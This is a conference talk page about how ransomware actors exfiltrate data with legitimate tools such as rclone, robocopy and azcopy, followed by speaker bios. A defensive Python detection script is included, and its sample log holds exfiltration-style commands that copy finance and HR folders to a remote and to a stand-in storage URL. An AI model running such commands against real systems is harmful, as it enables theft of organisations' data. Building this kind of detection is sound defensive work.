Wednesday 24 September 11:20 - 11:50, Red room
María José Erquiaga (Cisco), Darin Smith (Talos), Robert Harris (Cisco), Raymond McCormick (Talos) & Josh Pyorre (Talos)
Ransomware groups increasingly leverage legitimate tools to carry out data exfiltration during double extortion attacks. These tools are typically divided into three categories: native operating system utilities (e.g. xcopy, robocopy), third-party applications (e.g. rclone, syncthing), and cloud-based tools (e.g. Azure CLI, azcopy, gcloud). Their legitimate nature and widespread use make them ideal for stealthy operations, allowing attackers to reduce the likelihood of detection while transferring large volumes of data.
This research focuses on analysing the misuse of these trusted tools by ransomware actors. We study usage trends, command-line patterns, associated network ports, and exfiltration techniques across various ransomware campaigns. Our analysis includes both publicly documented cases and practical experimentation, enabling a detailed understanding of how these tools are configured and deployed in real-world scenarios. Through statistical and behavioural analysis, we identify patterns that can inform the development of more effective detection strategies. Examples include the frequent use of specific flags or commands, correlations with network activity, and timing of exfiltration events. We also categorize tools based on their likelihood of abuse and visibility within an enterprise environment.
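The detection angle described above (command-line patterns, destination indicators, timing and tool baselining) can be sketched as a small rule over process-creation events. The following is an added example written for this page, not code from the authors or from the matrix they describe; the log format, the baseline of sanctioned jobs, the off-hours window and the scoring threshold are all constructed assumptions. The tool names come from the abstract; the `--transfers` (rclone) and `/MT` (robocopy) flags are real options that raise transfer parallelism.

```python
"""Heuristic triage of legitimate-tool exfiltration candidates from process-creation logs.

Added example (not the authors' code). Log format, baseline and thresholds are constructed.
"""
import re
from dataclasses import dataclass, field

# Tool categories as listed in the abstract, keyed by image basename (lower-case, no extension).
TOOL_CATEGORIES = {
    "xcopy": "native OS utility",
    "robocopy": "native OS utility",
    "rclone": "third-party application",
    "syncthing": "third-party application",
    "az": "cloud tool (Azure CLI)",
    "azcopy": "cloud tool",
    "gcloud": "cloud tool",
}

# Constructed baseline of sanctioned jobs: (tool, user, destination substring).
# A match suppresses the event entirely; this is what keeps scheduled backups quiet.
BASELINE = [
    ("robocopy", "backup-svc", r"\\nas01\backup"),
]

# Real flags that raise transfer parallelism; seeing them in an ad-hoc run is one signal.
PARALLEL_FLAGS = {
    "rclone": re.compile(r"--transfers(?:[= ]\d+)?"),
    "robocopy": re.compile(r"/MT(?::\d+)?", re.I),
}

# Destination indicators. Single drive letters (D:\) are excluded so local copies do not match.
UNC_PATH = re.compile(r"\\\\[\w.-]+\\")
URL_DEST = re.compile(r"https?://", re.I)
RCLONE_REMOTE = re.compile(r"(?<![\w\\])(?![A-Za-z]:\\)[\w-]{2,}:[^\s\\]*")

# Constructed log line shape: "<ts> host=<h> user=<u> image=<path> cmd=\"<command line>\""
LOG_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)

ALERT_THRESHOLD = 2  # a tracked tool alone never alerts: legitimate use is the norm


@dataclass
class Finding:
    host: str
    user: str
    tool: str
    category: str
    reasons: list = field(default_factory=list)


def tool_name(image: str) -> str:
    """Normalise an image path to the tool key used in TOOL_CATEGORIES."""
    base = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def in_baseline(tool: str, user: str, cmd: str) -> bool:
    """True when a sanctioned (tool, user, destination) entry covers this command line."""
    return any(t == tool and u == user and dest.lower() in cmd.lower() for t, u, dest in BASELINE)


def analyze_line(line: str):
    """Return a Finding with its reasons, or None when the line is untracked or baselined."""
    m = LOG_RE.match(line)
    if not m:
        return None
    tool = tool_name(m["image"])
    category = TOOL_CATEGORIES.get(tool)
    if category is None:
        return None
    cmd = m["cmd"]
    if in_baseline(tool, m["user"], cmd):
        return None
    f = Finding(m["host"], m["user"], tool, category)
    if UNC_PATH.search(cmd):
        f.reasons.append("destination is a UNC path")
    if URL_DEST.search(cmd):
        f.reasons.append("destination is a URL")
    if tool == "rclone" and RCLONE_REMOTE.search(cmd):
        f.reasons.append("rclone remote destination")
    flag = PARALLEL_FLAGS.get(tool)
    if flag and flag.search(cmd):
        f.reasons.append("parallel-transfer flag set")
    hour = int(m["ts"][11:13])        # constructed off-hours window: 22:00-06:00 UTC
    if hour < 6 or hour >= 22:
        f.reasons.append("off-hours execution")
    f.reasons.append("no matching baseline entry")
    return f


def analyze(lines):
    return [f for f in map(analyze_line, lines) if f is not None]


def alerts(lines):
    return [f for f in analyze(lines) if len(f.reasons) >= ALERT_THRESHOLD]


# Constructed sample events: one ad-hoc rclone upload, one sanctioned backup, one local xcopy,
# one azcopy upload to a storage URL, and one unrelated process.
SAMPLE_LOG = [
    r'2025-09-24T02:14:33Z host=WS-117 user=jdoe image=C:\Users\jdoe\Downloads\rclone.exe cmd="rclone copy D:\Finance remote:bkt/finance --transfers 32"',
    r'2025-09-24T23:00:05Z host=SRV-BK01 user=backup-svc image=C:\Windows\System32\Robocopy.exe cmd="robocopy D:\Data \\nas01\backup /E /MT:16"',
    r'2025-09-24T14:07:41Z host=WS-042 user=jdoe image=C:\Windows\System32\xcopy.exe cmd="xcopy C:\Users\jdoe\Documents E:\scratch /E"',
    r'2025-09-24T11:30:12Z host=WS-117 user=jdoe image=C:\Tools\azcopy.exe cmd="azcopy copy D:\HR https://stor.example.invalid/container?sig=REDACTED"',
    r'2025-09-24T09:00:00Z host=WS-042 user=jdoe image=C:\Windows\System32\notepad.exe cmd="notepad.exe"',
]

if __name__ == "__main__":
    for f in alerts(SAMPLE_LOG):
        print(f"{f.host} {f.user} {f.tool} ({f.category}): {', '.join(f.reasons)}")
```

Run on the constructed sample, the rclone and azcopy events alert while the local xcopy stays below the threshold and the baselined robocopy job is suppressed; the point is that tool presence is only one signal, and the destination, flag and timing context from the abstract is what separates routine use from a candidate exfiltration.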
The results of this work will be shared as an open-access matrix, similar in spirit to the C2 Matrix project, enabling defenders and researchers to reference known tool behaviours and integrate this knowledge into their detection systems. By doing so, we aim to bridge a current gap in the literature and provide actionable insights to enhance cybersecurity defences against modern ransomware threats.
María José Erquiaga is a cybersecurity professional currently working as a threat researcher at Cisco. Her work focuses on threat intelligence, cloud security research, and detection engineering. She analyses adversary behaviours on network, endpoint and cloud domains and develops native detections for Cisco XDR. María has presented at conferences such as Botconf, Black Hat Europe, and DEFCON. She holds a Master's in high performance computing from the University of La Plata and a Professional Bachelor's degree in wireless networks and security from the University of Rennes 1 (IUT Saint-Malo, France).

Darin Smith leads a threat research team within Cisco Talos focused primarily on cloud native research & detection engineering. He has previously worked in threat hunting at Amazon and digital forensics at the US Federal Bureau of Investigation. He holds an M.Sc. from King's College London and a B.Sc. from the University of California, Davis.

Robert Harris is the Detections TME for Cisco Secure Network Analytics and Cisco XDR. He formerly worked as a security researcher in the Counter Threat Unit (CTU) at Secureworks, and now builds new NDR detections at Cisco. Outside of work, Robert helps run a large pet rescue and enjoys the outdoors with his personal and foster dogs.

Raymond McCormick, a cybersecurity expert at Cisco, provides cloud research and detection engineering capabilities. With a B.Sc. in computer science, he started as an active-duty military member, working on communications and DoD networks. He transitioned to cybersecurity, supporting threat modelling and incident response for government operations and supporting JFHQ DoDIN and USCYBERCOM.

Josh Pyorre is a security researcher with Cisco Talos. He has been in security since 2000, having worked at NASA, Mandiant, OpenDNS, ZScaler, and at various non-profits. Josh has presented at DEFCON, B-Sides, Derbycon, DeepSec, Qubit, Infosec World, RSA, BlackHat, and more. His professional interests involve network, computer and data security with a goal of maintaining and improving the security of as many systems and networks as possible. His website is https://pyosec.com
Back to VB2025 conference page